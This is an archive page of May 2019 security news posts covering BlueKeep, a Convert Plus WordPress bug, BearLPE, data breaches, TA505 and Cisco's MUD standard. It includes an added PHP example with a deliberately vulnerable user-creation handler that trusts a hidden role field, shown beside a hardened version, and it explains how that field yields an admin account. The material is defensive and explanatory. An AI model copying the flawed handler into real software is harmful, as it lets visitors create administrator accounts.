Monthly Archives: May 2019

Using Firepower to defend against encrypted RDP attacks like BlueKeep

This blog authored by Brandon Stultz

Microsoft recently released fixes for a critical pre-authentication remote code execution vulnerability in Remote Desktop Protocol Services (RDP). Identified as CVE-2019-0708 in May’s Patch Tuesday, the vulnerability caught the attention of researchers and the media because it is “wormable,” meaning an attack exploiting it could easily spread from one machine to another.

Cisco Talos started reverse-engineering work immediately to determine how exactly RDP was vulnerable. Talos wrote and released coverage as soon as we were able to determine the vulnerability condition. SID 50137 for SNORT® correctly blocks exploitation of CVE-2019-0708 and scanning attempts that leverage this vulnerability.


The post Using Firepower to defend against encrypted RDP attacks like BlueKeep appeared first on Cisco Blog.

WordPress Plugin’s Administrator Creation Bug Disclosed

WordPress and other content management systems (CMS) are heaven-sent for non-programmers, who can build and update the contents of their website without knowing any programming language or scripting technique. CMS developers are on top of the situation when it comes to fixing bugs and security vulnerabilities in their products; however, the same CMS offer feature-expansion capabilities that are beyond the full control of the core developers. These are the plugins, created by independent developers, which easily extend the capability of a default CMS installation. It is a living case of convenience vs. security, since the flexibility provided by an installed plugin increases the security risk and expands the attack surface of the CMS.

Here, we continue to inform people which particular Internet-facing software has a current critical issue, to provide you with well-informed options to decide what to do next. This time around, a WordPress plugin named Convert Plus has a critical bug that can literally throw the baby out with the bath water. Formerly known as Convert Plug, the Convert Plus plugin gives a WordPress website lead-generation capability, which it claims captures more users and traffic for the site over the long term.

The vulnerable version of Convert Plus gives an external user the ability to obtain an administrator-level account when submitting the website’s new-user creation form. The bug comes from the “cp_set_user” value, which is kept in a hidden form field; because an outsider can modify that value, changing “cp_set_user” to “administrator” makes the new account a super user for the website. Convert Plus version 3.4.2 and older have this privilege escalation flaw, and all WordPress administrators who deploy the plugin need to upgrade to version 3.4.3, which patches the problem.

“This (buggy) code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed. Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address. The new account is given a randomized password, but the attacker can issue a typical password reset to gain access to their rogue administrator account,” explained Mikey Veenstra, a security researcher for Wordfence, as he described what they call the Unauthenticated Administrator Creation bug.
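As an added illustration (this is not Convert Plus code and not taken from the Wordfence write-up), the handler below reproduces the bug class described above, a role read from a client-controlled hidden field, beside a hardened version that never lets the request choose the role. The function names other than cp_add_new_user_role, the nonce action and the option name are assumptions; the WordPress core functions are used as documented.

```php
<?php
// Hypothetical AJAX subscription handlers (added example, not plugin code).
// Assumes WordPress core: wp_insert_user, wp_generate_password, sanitize_email,
// is_email, email_exists, check_ajax_referer, wp_send_json_*, WP_Error.

// VULNERABLE: the role is taken from the hidden "cp_set_user" form field, so
// any visitor who edits that field before submitting picks their own role.
function cp_add_new_user_role_vulnerable( array $request ) {
	$email = sanitize_email( $request['email'] ?? '' );
	$role  = $request['cp_set_user'] ?? 'subscriber'; // attacker-controlled

	if ( ! is_email( $email ) ) {
		return new WP_Error( 'bad_email', 'Invalid email address.' );
	}
	return wp_insert_user( array(
		'user_login' => $email,
		'user_email' => $email,
		'user_pass'  => wp_generate_password( 24 ),
		'role'       => $role, // "administrator" is accepted unchanged
	) );
}

// HARDENED: the role comes from a server-side setting chosen by the site
// administrator (assumed option name "cp_default_role"), is checked against
// an allow-list of low-privilege roles, and the request value is ignored.
function cp_add_new_user_role_hardened( array $request ) {
	$allowed = array( 'subscriber', 'contributor' );
	$role    = get_option( 'cp_default_role', 'subscriber' );
	if ( ! in_array( $role, $allowed, true ) ) {
		$role = 'subscriber'; // a tampered option can never yield admin
	}

	$email = sanitize_email( $request['email'] ?? '' );
	if ( ! is_email( $email ) ) {
		return new WP_Error( 'bad_email', 'Invalid email address.' );
	}
	if ( email_exists( $email ) ) {
		return new WP_Error( 'exists', 'An account with that email already exists.' );
	}
	return wp_insert_user( array(
		'user_login' => $email,
		'user_email' => $email,
		'user_pass'  => wp_generate_password( 24 ),
		'role'       => $role,
	) );
}

// Unauthenticated AJAX entry point (assumed action name "cp_subscribe").
// The nonce ties the request to a form the site actually rendered.
function cp_handle_subscription() {
	check_ajax_referer( 'cp_subscribe', 'nonce' );
	$result = cp_add_new_user_role_hardened( $_POST );
	if ( is_wp_error( $result ) ) {
		wp_send_json_error( $result->get_error_message(), 400 );
	}
	wp_send_json_success( array( 'user_id' => $result ) );
}
add_action( 'wp_ajax_nopriv_cp_subscribe', 'cp_handle_subscription' );
add_action( 'wp_ajax_cp_subscribe', 'cp_handle_subscription' );
```

When auditing a plugin for this class of bug, search for every `wp_insert_user` or `add_role` call and trace where the role value originates; anything that can be reached from `$_POST`, `$_GET` or `$_REQUEST` is the same defect.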

Elvina Goves of the Convert Plus team acknowledged the responsible disclosure by Wordfence. The latter gave the Convert Plus team enough time to issue a patch and perform a security audit of the plugin, and only released the details of how to trigger the bug after the fix was already publicly available for download. “We are thankful to the team at Wordfence, who reported a vulnerability. We worked closely with them to understand the issue further and released a fix within 3 days. There is nothing to panic as we’ve not come across any known breakthroughs caused due to this vulnerability. We strongly believe that security is not an absolute and a one time fix that will work. It is a continuous process and should be managed regularly with regular checks and updates. We highly recommend our users to activate their license, so that they do not miss on such update notifications and can update Convert Plus with a single click,” emphasized Goves.


0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler

Researchers at 0patch released a temporary micropatch for the unpatched BearLPE local privilege escalation zero-day flaw in Windows 10.

Experts at 0patch released a micropatch that temporarily fixes the still-unpatched local privilege escalation flaw and can be applied to systems without rebooting them.

The zero-day vulnerability, dubbed BearLPE, was recently disclosed by the security researcher SandboxEscaper.

The following video shows how the micropatch, composed of just five instructions, works on a vulnerable machine:

The exploit published by the expert triggers the flaw that resides in the Task Scheduler of Windows 10.

SandboxEscaper discovered that even starting with limited privileges it is possible to get SYSTEM rights by invoking a specific function. SandboxEscaper published a video PoC of the Windows zero-day that shows how to trigger it on Windows x86.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

According to Will Dormann, a vulnerability analyst at CERT/CC, the exploit is 100% reliable on x86 systems and needs to be recompiled for x64 machines.

“When you run Windows XP schtasks.exe on Windows 10, legacy RPC functions are called – which in turn call the current ones, such as SchRpcSetSecurity,” explained 0patch co-founder Mitja Kolsek.

The micropatch prevents changing the set of permissions a normal user has over a system file.


Pierluigi Paganini

(SecurityAffairs – micropatch, BearLPE)

The post 0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler appeared first on Security Affairs.

Chinese Dating Apps Leak US User Data


An unsecured Elastic database associated with dating apps has been discovered by a security researcher, exposing easily identifiable data. Jeremiah Fowler, who has been working in the security software industry for over 10 years, found the database, which held information about US dating app customers, including their sexual preferences, lifestyle choices, and whether they were unfaithful to their partners. Fowler wrote on Security Discovery, "it is easy for anyone to identify a large number of users with relative accuracy based on their 'User ID.'"

According to Fowler, the IP address for the database was located on a US server, and the majority of users appeared to be Americans. Even though the data was hosted for "multiple dating applications," upon further investigation he found them to be developed by separate companies or individuals.

He was able to identify the users' real identities online, as the dating applications logged and stored the user’s IP address, age, location, and user names. "Like most people, your online persona or user name is usually well crafted over time and serves as a unique cyber fingerprint," wrote Fowler. 

He attempted to contact the email addresses associated with the applications and identify the address and phone number using the Whois domain registration. "The address that was listed there was Line 1, Lanzhou and when trying to validate the address I discovered that Line 1 is a Metro station and is a subway line in Lanzhou," he explained on his blog. "The phone number is basically all 9’s and when I called there was a message that the phone was powered off.

"I am not saying or implying that these applications or the developers behind them have any nefarious intent or functions, but any developer that goes to such lengths to hide their identity or contact details raises my suspicions. Call me old fashioned, but I remain skeptical of apps that are registered from a metro station in China or anywhere else."

Terry Ray, senior vice president and Imperva Fellow, told Infosecurity that he agrees with Fowler's sentiments: "There are several strange things about this leaky database, especially the fact that the applications appear to target English speakers yet have, at least in one app, a business location in China, as well as having all owner or admin contact falsified or unavailable. It makes you wonder who is storing this data from these particular dating apps and what the underlying purpose is.

"Furthermore, why are multiple dating apps storing their data in the same place, yet little or no connection between the apps, their product names or their business contacts?"

At the time of writing his blog, Fowler disclosed that the database was still "publicly accessible" and despite a large number of users, there was no personally identifiable information. He had not received responses to his emails. "What concerns me most is that the virtually anonymous app developers could have full access to user’s phones, data, and other potentially sensitive information," he wrote. "It is up to users to educate themselves about sharing their data and understand who they are giving that data to. This is another wake-up call for anyone who shares their private information in exchange for some kind of service."

According to Verizon, 22% of data breaches in 2017 involved the use of stolen credentials, with 36% of compromised data being personal information such as name, birthday and gender.

"Although the article notes that this database wasn’t storing personally identifiable information, the writer was, in fact, able to ‘identify’ some of the ‘persons’ with the credentials found, this highlights the importance that if you are storing user data, you are responsible for ensuring that data is protected," Ray told Infosecurity. "Further, if you’re an app user and want to remain anonymous, make sure you use different usernames and passwords as much as possible."

Checkers and Rally’s Victims of Data Breach


On Wednesday, Checkers Drive-In Restaurants alerted customers that it had been dealing with a data security issue involving "malware at certain locations."

On its website, the restaurant group announced that after discovering the issue, it "engaged leading data security experts to conduct an extensive investigation." Federal law enforcement authorities have also been informed in order to address the matter, with all parties working to contain and remove the malware.

"After becoming aware of a potential issue, we retained data security experts to understand its nature and scope," Checkers wrote on its website. "Based on the investigation, we determined that malware was installed on certain point-of-sale systems at some Checkers and Rally’s locations, which appears to have enabled an unauthorized party to obtain the payment card data of some guests." According to the website, not all locations were affected by this issue.

The malware was reportedly designed to "collect information stored on the magnetic stripe of payment cards." This included cardholder name, payment card number, card verification code and expiration date. Checkers has launched an investigation and is working with payment card companies to protect cardholders. 

The restaurant group has recommended that card users "remain vigilant" and review account statements. "If you believe there is an unauthorized charge on your card, please contact your financial institution or card issuer immediately," the website states. 

Other recommendations include ordering a credit report: "When you receive your credit report, review it carefully," the website continues. "Look for accounts you did not open, for names of creditors from whom you haven’t requested credit." 

The law firm of Federman & Sherwood has initiated an investigation into the data breach.

TA505 Suspected in Chilean Financial Institutions Malware Attacks


Investigators from CyberInt Research have identified further activities by the suspected Russian-speaking cyber-gang TA505, targeting financial institutions in Chile. The cyber-gang is continuing its "unauthorized and nefarious use of the same TTPs of legit software, this time leveraging MSI Installer to deploy the AMADAY malware family," according to the company.

The AMADAY implant allows cyber-criminals to steal financial institutions’ and retailers’ clients’ email correspondence and sensitive information. This further enables them to steal contact lists, allowing them to target additional organizations by sending seemingly legitimate malicious emails that appear to come from trusted sources.

TA505 has been active since 2014, with high-volume malicious email campaigns distributing the Dridex and Shifu banking Trojans, as well as the Neutrino botnet/exploit kit and Locky ransomware. They appeared again as the source for recent attacks against the global financial and retail industry from December 2018 to present, with attacks worldwide, including India, Italy, Malawi, Pakistan, South Korea and the United States.

“TA505 is highly motivated, very clever, and persistent,” says Adi Peretz, head of research at CyberInt. “It’s critical to monitor their activities to anticipate further attacks. Once the pattern of attacks in Chile was identified, other financial institutions can beef up their security, so they don’t end up being breached."

“Social engineering works because it recruits the weakest link in any cybersecurity operation – we humans,” continues Peretz. “The more prepared companies are, the better they can train their people to maintain security.”

In April 2019, Infosecurity Magazine reported that TA505 was using a TektonIT remote administration tool to target financial and retail institutions. CyberInt found that the tool was "virtually undetectable" by threat protection systems due to it being "legitimate software." 

"Tried and tested attack patterns appear to be consistent across these recently observed campaigns and commence with the delivery of phishing emails that have lure document attachments," according to a CyberInt report. "Utilising legitimate logos, language and terminology consistent with common business interactions or the target organization, the email encourages the potential victim to open the lure document attachment which in turn instructs them to disable security controls within Microsoft Office to allow a nefarious macro to be executed."

Threat Roundup for May 24 to May 31

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 17 and May 24. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or


TRU05312019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 24 to May 31 appeared first on Cisco Blog.

Rally’s and Checkers’ POS Infection Since 2015 Exposed

Did you patronize one of the Rally’s food joints or Checkers Drive-In restaurants since December 2015? Then this news is for you: the two drive-through food chains, with 100+ branches in the United States, had 15% of their cash registers infected by POS malware since late 2015. Customer information was harvested by the malware, with the latest data showing that retail transactions up to April 30, 2019, were affected. Rally’s and Checkers operate stores in the states of Virginia, Tennessee, Pennsylvania, Ohio, North Carolina, New York, New Jersey, Nevada, Michigan, Louisiana, Kentucky, Indiana, Illinois, Georgia, Florida, Delaware, California, Arizona and Alabama.

One of the worst hit by the malware was a Rally’s food joint in Los Angeles, where the infection of the point-of-sale terminal started on December 17, 2015, and the store technicians were only able to clean the machine on March 28, 2018. “After becoming aware of a potential issue, we retained data security experts to understand its nature and scope. Based on the investigation, we determined that malware was installed on certain point-of-sale systems at some Checkers and Rally’s locations, which appears to have enabled an unauthorized party to obtain the payment card data of some guests,” explained Kim Francis, media coordinator for Magpie, LLC, the umbrella entity that owns both Checkers and Rally’s.

In the name of transparency, Magpie posted on its website a list of all its branches with exposed customer data and the period of infection. We highly recommend that customers of the two food chains check out the list, in order to narrow down the possibility of their personal information being part of the leak. Kim Francis also disclosed that the customer data the POS held came from the magnetic-stripe debit/credit cards that clients used to pay for their food purchases. In the United States, the use of magnetic-stripe cards for payment is still prevalent compared to the more secure EMV (Europay, Mastercard, Visa) chip-based cards. The information likely exposed is the cardholder’s full name, card number, verification code and expiration date.

“After identifying the incident, we promptly launched an extensive investigation and took steps to contain the issue. We also are working with federal law enforcement authorities and coordinating with the payment card companies in their efforts to protect cardholders. We continue to take steps to enhance the security of Checkers and Rally’s systems and prevent this type of issue from happening again,” added Francis.

Magpie recommends that affected customers apply for free credit report monitoring from, alternatively their clients can also call 1-877-322-8228. Additionally, customers should be extra vigilant when reading account statements, as discrepancies and fraudulent transactions on credit charges can be reversed by the card-issuing bank. At the same time, Magpie has opened a special hotline, 1-844-386-9554, for customers who have specific queries regarding the incident. The company also opens its main office for walk-in queries: Monday through Friday from 8:00 a.m. to 10:00 p.m. CST and Saturday and Sunday from 10:00 a.m. to 7:00 p.m. CST.


The Importance of the MSP Sales Process

Reading Time: ~ 3 min.

I’ve been in this business a long time, and I can honestly say that many MSPs lack a concrete sales process structure. That’s pretty worrisome because, let’s face it, you have to have a plan in order to succeed at just about anything. Imagine you’re an engineer working on server maintenance or a network infrastructure build—you wouldn’t do that without a plan, would you? Your sales strategy should be handled no differently. 

Dos and Don’ts for your Sales Process

First, let’s talk about some don’ts. Avoid taking a call and immediately giving a quote over the phone, as well as going straight to the customer site to conduct ad hoc assessments and sales presentations in the same breath. To build value, you need to stretch this into multiple touches, by which I mean multiple meetings. Sure, that’s more work for you up front, but it’s crucial for establishing trust with the client. You need to open and sustain a dialog about their needs so you can tailor a unique solution for them, without diving right into a pitch. By leading with careful consideration and attention to their needs, you can begin building a lasting relationship and, eventually, bring them a better offering.

Here’s how I recommend you structure your process.

Schedule an on-site strategy session with your client.

Meeting with a prospect face-to-face will demonstrate your investment in a trust relationship. Now, you have to listen to them. Don’t lead with a pitch. Let them tell you what their problems are, pay close attention to them as they express their needs, and take note of all their pain points.

This is also the ideal opportunity to truly grasp whether the demands are excessive or unreasonable for your capabilities. Each relationship you enter into with clients is a partnership that comes with shared responsibilities. Be more than a fulfill/deliver shop.

Perform an in-depth assessment and discovery.

You need to discover everything that’s on the client’s network and assess exactly where they stand. Don’t do this on the same day as that initial meet; schedule a second one. Take the extra time between the meetings to prepare more specific questions that will delve more deeply into the needs your prospect expressed. This will help show the client that you’re invested in their unique challenges.

When you come back, bring an engineer or assistant with you. You need someone with you who can interview different staff members and find out about the specific issues they face. Ask basic questions to understand how the employees feel about where the company’s IT stands, like: What kind of issues are you having?; What do you see wrong with your computer network?; How could your network be improved?; and What things would you like to see change? 

As you’re doing your assessment and discovery, make sure to bring cybersecurity into the discussion. Managed cybersecurity is often a poor experience, so this is your chance to feel out how else you can alleviate their pains (and set yourself apart from their current provider).

And, finally, book the third meeting. 

Make the pitch.

Ideally, your third meeting would be at your location. If there’s some reason you can’t do it in your own shop, take the prospect off-site for lunch at a restaurant that has private meeting rooms. Essentially, you want to avoid doing the presentation in their office, where they can easily get interrupted.

In this case, it will pay to be overly prepared. Again, if you listened closely, the prospect would’ve already told you what to focus on to help them succeed. Use that knowledge to craft the right message to deliver during this meeting. 

Start by walking through the pain points they and their employees revealed. Talk over anything else you found in your discovery/assessment that could be improved. Have an itemized list, and then ask them if they agree with all the issues you’ve found.

Once you get agreement, then you can go into your sales pitch and present them with a well-tailored offering that can actually solve their challenges and help them grow. 

Ultimately, by listening to your prospect, exhibiting an understanding of their needs, and demonstrating your level of commitment to providing value and nurturing the relationship itself, you’ll be well on your way to building a meaningful, successful business partnership.

The post The Importance of the MSP Sales Process appeared first on Webroot Blog.

Cyber News Rundown: Popular News Site Breached

Reading Time: ~ 2 min.

News Site Suffers Data Breach

Flipboard, a news aggregation site, recently revealed that it’s been the victim of a data breach that could affect many of their more than 100 million active users. Digital tokens were among the compromised data, which could give the attackers further access to other sites, though Flipboard promptly removed or replaced them. At least two separate breaches have been reported by Flipboard, with one occurring in the middle of 2018 and the other in April of this year. Both allowed the attackers nearly unlimited access to databases containing a wealth of user data.

Keylogger Targets Multiple Industries

At least two separate campaigns have been found to be sending malicious emails to industry-leading companies in several different areas of business. Hidden within these emails are two variants of the HawkEye keylogger that perform various malicious activities beyond simply stealing keystrokes from the infected device. By acting as a loader, HawkEye can install additional malware and even contains a script to relaunch itself in case of a system reboot.

Australian Teen Hacks Apple

A teen from Australia was recently in court to plead guilty to two separate hacks on Apple, which he conducted in hopes of gaining a job with the company. While Apple has since confirmed that no internal or customer data was breached, they have chosen leniency after his lawyer made a case for the perpetrator being remorseful and not understanding the full impact of his crimes.

Fake Crypto-wallets Appear on App Store

Several fake cryptocurrency wallets have made their way into the Google Play store following the latest rise in the value of Bitcoin. Both wallets use some form of address scam, by which the user transfers currency into a seemingly new wallet address that was actually designed to siphon off any transferred currency. The second of the two wallets operated under the guise of being the “mobile” version of a well-known crypto-wallet. It was quickly identified as fake due to an inconsistent icon image. Both fake wallets were tied to the same domain and have since been removed from the store.

Ransomware Focuses on MySQL Servers

While the threat of GandCrab is not new, organizations discovered its persistent risk after researchers found it has been refocused on attacking MySQL servers. By specifically targeting the port used to connect to MySQL servers, port 3306, the attackers have had some success, since many admins allow port 3306 to bypass their internal firewalls to ensure connectivity. As GandCrab continues to narrow its attack scope, its remaining viable vectors are likely to be even more lucrative given that most organizations are not able to secure everything.

The post Cyber News Rundown: Popular News Site Breached appeared first on Webroot Blog.

TrustArc Participates in IAPP Canada Privacy Symposium 2019

TrustArc was pleased to once again take part in the IAPP Canada Privacy Symposium held on May 23rd and 24th in picturesque Toronto–participating in four conference sessions, side events and, of course, countless conversations. The annual confab of industry thought-leaders, regulators and privacy professionals from Canada and abroad came at a particularly fascinating moment for privacy and data protection in the world’s second largest country. Recent events that have cast Canada in the privacy spotlight include the Office of the Privacy Commissioner (OPC)’s release of findings against the Canadian arm of a global credit reporting agency headquartered in the U.S.; …

The post TrustArc Participates in IAPP Canada Privacy Symposium 2019 appeared first on TrustArc Blog.

MUD is officially approved by IETF as an Internet Standard, and Cisco is launching MUD1.0 to protect your IoT devices

With over 8 billion “things” being connected today, IoT security has undoubtedly evolved from a mysterious buzzword to one of the biggest real threats to our network today. According to Gartner, over 51% of survey respondents believe that cybersecurity is the number one technology-related challenge for IoT deployment.

Overwhelmed by the countless number of IoT security comments and stories, let’s try to demystify this seemingly complex concept. To begin, let me ask you three simple questions: What types of IoT devices are connected to your network? What behaviors are appropriate for these IoT devices? Is there an industry standard to follow while connecting these IoT devices? If you don’t know the answers to these questions yet, that’s when we say the IoT security risks are probably right around the corner staring at you.

What is MUD?

To answer the above three questions, Cisco has been working on a solution known as Manufacturer Usage Description (MUD) to arm you with IoT security.

The key idea of MUD is to facilitate device visibility and segmentation by allowing your network administrators to effortlessly identify the type of IoT device and define the corresponding appropriate behaviors for that device. To do this accurately, we are introducing a participant to the conversation: the manufacturer. IoT manufacturers are able to disclose to us what their devices are, and what network policies they need for the devices to correctly function.  This whitelist statement is something that customers can use to deploy access policies in their own networks without any guesswork.

As shown in Figure 1, an IoT device first sends out a pre-embedded MUD-URL to the network devices (e.g. switch & AAA server), through which the MUD-URL will be received by the MUD controller (software). According to the specific MUD-URL, a matching MUD file will be provided from the MUD file server and translated into policy format through the MUD controller, to then enforce the access control list to the device.
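As an added example of the last step in that flow (this is not Cisco’s MUD controller and not code from the post), the script below takes a MUD file in the RFC 8520 JSON format and translates its from-device and to-device access lists into flat ACL rules for one device. The MUD file is a constructed sample modelled on the RFC’s light-bulb example; the hostnames, ACL names and the device IP 10.0.0.20 are invented.

```php
<?php
// Added example: MUD file (RFC 8520 JSON) -> ACL rules for one IoT device.
// Not Cisco's controller code. The sample file below is constructed; the
// hostnames, ACL names and the device address are invented for the demo.

$mudFile = <<<'JSON'
{
  "ietf-mud:mud": {
    "mud-version": 1,
    "mud-url": "https://lighting.example.com/lightbulb2000",
    "cache-validity": 48,
    "systeminfo": "Example smart light bulb (constructed sample)",
    "from-device-policy": { "access-lists": { "access-list": [ { "name": "mud-1-v4fr" } ] } },
    "to-device-policy":   { "access-lists": { "access-list": [ { "name": "mud-1-v4to" } ] } }
  },
  "ietf-access-control-list:acls": { "acl": [
    { "name": "mud-1-v4fr", "type": "ipv4-acl-type", "aces": { "ace": [ {
        "name": "cl0-frdev",
        "matches": {
          "ipv4": { "ietf-acldns:dst-dnsname": "controller.lighting.example.com", "protocol": 6 },
          "tcp":  { "ietf-mud:direction-initiated": "from-device",
                    "destination-port": { "operator": "eq", "port": 443 } } },
        "actions": { "forwarding": "accept" } } ] } },
    { "name": "mud-1-v4to", "type": "ipv4-acl-type", "aces": { "ace": [ {
        "name": "cl0-todev",
        "matches": {
          "ipv4": { "ietf-acldns:src-dnsname": "controller.lighting.example.com", "protocol": 6 },
          "tcp":  { "ietf-mud:direction-initiated": "from-device",
                    "source-port": { "operator": "eq", "port": 443 } } },
        "actions": { "forwarding": "accept" } } ] } }
  ] }
}
JSON;

// One access-control entry (ACE) -> one flat rule. $dir is "from-device" or
// "to-device"; $deviceIp is the address the device obtained on the network.
function aceToRule(array $ace, string $dir, string $deviceIp): array
{
    $m  = $ace['matches'];
    $l3 = $m['ipv4'] ?? $m['ipv6'] ?? [];
    $l4 = $m['tcp'] ?? $m['udp'] ?? [];
    // MUD names the peer by DNS name; a real controller resolves it when the
    // policy is installed and re-resolves it while cache-validity lasts.
    $peer = $l3['ietf-acldns:dst-dnsname'] ?? $l3['ietf-acldns:src-dnsname'] ?? 'any';
    $port = static function (string $key) use ($l4) {
        $p = $l4[$key] ?? null;
        return ($p !== null && ($p['operator'] ?? 'eq') === 'eq') ? (int) $p['port'] : 'any';
    };
    // In a to-device ACE, "direction-initiated: from-device" admits only the
    // return half of a session the device opened: a stateless ACL needs "established".
    $established = $dir === 'to-device'
        && ($l4['ietf-mud:direction-initiated'] ?? null) === 'from-device';
    return [
        'name'        => $ace['name'],
        'action'      => ($ace['actions']['forwarding'] ?? 'drop') === 'accept' ? 'permit' : 'deny',
        'proto'       => [6 => 'tcp', 17 => 'udp'][$l3['protocol'] ?? 0] ?? 'ip',
        'src'         => $dir === 'from-device' ? $deviceIp : $peer,
        'dst'         => $dir === 'from-device' ? $peer : $deviceIp,
        'sport'       => $port('source-port'),
        'dport'       => $port('destination-port'),
        'established' => $established,
    ];
}

// Whole MUD file -> ordered rules for both directions, each direction ending
// in an explicit deny: MUD is a whitelist, anything not listed is dropped.
function mudToRules(string $json, string $deviceIp): array
{
    $doc = json_decode($json, true);
    if (!is_array($doc) || ($doc['ietf-mud:mud']['mud-version'] ?? 0) !== 1) {
        throw new RuntimeException('not a MUD file, or unsupported mud-version');
    }
    $mud  = $doc['ietf-mud:mud'];
    $acls = [];
    foreach ($doc['ietf-access-control-list:acls']['acl'] ?? [] as $acl) {
        $acls[$acl['name']] = $acl;
    }
    $rules = [];
    foreach (['from-device-policy' => 'from-device', 'to-device-policy' => 'to-device'] as $policy => $dir) {
        foreach ($mud[$policy]['access-lists']['access-list'] ?? [] as $ref) {
            if (!isset($acls[$ref['name']])) {
                throw new RuntimeException("dangling ACL reference {$ref['name']}");
            }
            foreach ($acls[$ref['name']]['aces']['ace'] as $ace) {
                $rules[] = aceToRule($ace, $dir, $deviceIp);
            }
        }
        $rules[] = ['name' => "$dir-default", 'action' => 'deny', 'proto' => 'ip',
            'src' => $dir === 'from-device' ? $deviceIp : 'any',
            'dst' => $dir === 'from-device' ? 'any' : $deviceIp,
            'sport' => 'any', 'dport' => 'any', 'established' => false];
    }
    return $rules;
}

foreach (mudToRules($mudFile, '10.0.0.20') as $r) { // 10.0.0.20: assumed DHCP lease
    printf("%-19s %-6s %-3s %s:%s -> %s:%s%s\n", $r['name'], $r['action'], $r['proto'],
        $r['src'], $r['sport'], $r['dst'], $r['dport'], $r['established'] ? ' established' : '');
}
```

The two explicit deny rules are the point of MUD for a defender: a bulb that suddenly tries to reach anything other than its controller on 443 is blocked, and the drop is logged by the enforcing switch rather than discovered after lateral movement.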

Clear benefits to both customers and device manufacturers brought by MUD

If you get the overall idea of MUD so far, you may see that IoT device manufacturers and customers are two key stakeholders in the MUD ecosystem. MUD offers distinct benefits for customers and manufacturers:

Benefits to customers:

  • Automate IoT device type identification thus reducing operational costs
  • Simplify and scale IoT device access management by automating policy enforcement process
  • Reduce threat surface of exploding number of IoT devices by regulating traffic and thus avoiding lateral infections
  • Secure enterprise network through standards-based approach

Benefits to manufacturers:

  • Improve customer satisfaction and adoption due to reduced operational costs and security risks
  • Enhance device security through standards-based onboarding procedure
  • Differentiate device offerings with embedded network-based device security feature
  • Reduce product support costs to customers by following an easy-to-implement process

In addition to these benefits, we’ve received positive feedback from our partners:

“MUD technology is valuable for Innovative Lighting. MUD technology will enhance our commissioning process by identifying our devices on the network. Furthermore, MUD technology will provide the appropriate access control policy promoting a more secure system. We look forward to working more with Cisco and the MUD technology.”

-Harry Aller, CTO at Innovative Lighting

“MUD was selected to protect Molex IoT solution against malicious parties. MUD is a relatively simple solution to implement at the device level, light on constrained IoT devices but takes advantage of strong network infrastructure including network switches and authorization server. Our goal to reduce exposure footprint and the overall solution allows us to provide a level of security to our customers that is scalable and flexible at the same time. The ability to whitelist specific devices in the field allows us to lock down the network but also to respond quickly to events that may take place post deployment.”

-Mo Alhroub, Manager of Software Engineering at Molex

MUD is approved as an Internet Standard and released as RFC 8520 by the IETF

I am delighted to announce that MUD has been officially approved as an Internet Standard by the Internet Engineering Task Force (IETF) and is now released as RFC 8520. You can find all of the details here. Meanwhile, MUD is also part of the NIST Mitigating IoT-Based DDoS project, and is now an optional component of the Open Connectivity Foundation’s framework.

MUD 1.0 is ready

Besides the IETF approval, I am also thrilled to announce that we are launching MUD 1.0, the first phase of the entire MUD solution. While MUD itself is an open standard, Cisco is pioneering our own version by using a Cisco switch and ISE (Identity Services Engine, an AAA server) as the network devices shown in Figure 1.

In this Cisco MUD 1.0 release, we focus on providing device visibility by enabling IoT device identification inside the enterprise network. As shown in Figure 2, the IoT device sends the MUD-URL to the switch, which then passes it to ISE. Administrators see device-specific information in the ISE UI, including the device model, manufacturer, etc. Specifically, MUD 1.0 supports profiling IoT devices, creating profiling policies dynamically, and automating the entire process of creating policies and Endpoint Identity Groups. Furthermore, administrators can use these profiling policies to manually create Authorization Policies and Profiles for securely onboarding IoT devices.

To put a sophisticated story simply: with MUD 1.0, you know exactly which devices are joining your network the minute they are connected. Even more, you can define policies for these IoT devices. Isn’t that amazing?!

With MUD 1.0 released, future releases will more fully automate the policy control part. Building on MUD 1.0, once ISE has received the MUD-URL and extracted the visibility information, the MUD-URL will be passed to the MUD controller (software), which will fetch the MUD file from the MUD server and translate its content into policy (as shown in Figure 1). The network devices will then enforce the appropriate policy on the devices. The whole process will be fully automated. Want more flexibility as well? No worries, we’ve got you covered! Before the automated enforcement, you get the choice to edit the recommended policy as needed.

Next steps

Join us at Cisco Live San Diego US 2019, to check out the MUD capabilities in person! We will have a demo partnering with Molex (Networking + Security Innovation Forum, demo pod #8, 6/10/2019-6/13/2019), and a Technical Breakout session (ID:BRKIOT-1553, 6/12/2019 4PM) at San Diego Convention Center.

Moving forward, we are upgrading and further building a MUD DevNet website. There will be clear step-by-step guidance for both end customers and device manufacturers to help you understand how the solution works and get the support you need. Stay tuned!

Reach out to Cisco sales representatives if you are interested in deploying MUD1.0 on your network. Or shoot an email to, if you have any other questions or are interested in being our partners. We have all of the experts here to support you!



The post MUD is officially approved by IETF as an Internet Standard, and Cisco is launching MUD1.0 to protect your IoT devices appeared first on Cisco Blog.

Cybersecurity and Drones – A Rising Threat?

Drones, which are part of the UAV (unmanned aerial vehicles) group, have certainly seen an increase in popularity in the past few years. The global drone market is expected to grow from $14 billion in 2018 to over $43 billion in 2024. Long gone are the days when drones were only used for military purposes – today they can basically be purchased and flown by anyone. They can be affordable, come in all sizes, and can get as sophisticated as you can imagine.

Drones are now used for a multitude of purposes, ranging from recreational use, photography and filmmaking, agriculture, to surveillance and so many other uses. This technology will soon even be utilized by Amazon to deliver small packages, has already been employed by Domino’s to bring pizza, and UPS has used it to ship medical samples in the US. 

